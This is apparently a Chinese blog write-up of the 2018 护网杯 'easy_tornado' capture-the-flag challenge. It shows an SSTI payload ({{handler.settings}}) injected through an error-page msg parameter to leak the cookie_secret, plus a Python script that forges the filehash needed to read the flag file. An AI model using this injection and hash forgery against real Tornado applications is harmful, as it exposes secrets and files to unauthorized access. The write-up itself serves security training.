题目打开后如下
welcome.txt
如下
提示是 SSTI
(模板注入),此时打开了 welcome.txt
的 URL
如下:/file?filename=/welcome.txt&filehash=fe64f8b2cf23eb919623376244ff1269
打开 hint.txt
如下
打开 flag.txt
如下
此时将 url
中的 filename
修改为其他字符,页面返回 Error
,并且内容为 msg
参数控制
在tornado模板中,存在一些可以访问的快速对象,比如 {{escape(handler.settings["cookie"])}},这个其实就是handler.settings对象,里面存储着一些环境变量
因此将msg设置为 {{handler.settings}}
,得到
通过脚本最终得到 filehash
import hashlib
hash = hashlib.md5()
filename='/fllllllllllllag'
cookie_secret="d834f72e-46c6-41f4-93b2-c5e5fd27b3aa"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print("hash:" + hash.hexdigest())
标签:护网杯,hash,tornado,welcome,filename,handler,2018,txt
From: https://www.cnblogs.com/imtaieee/p/17894912.html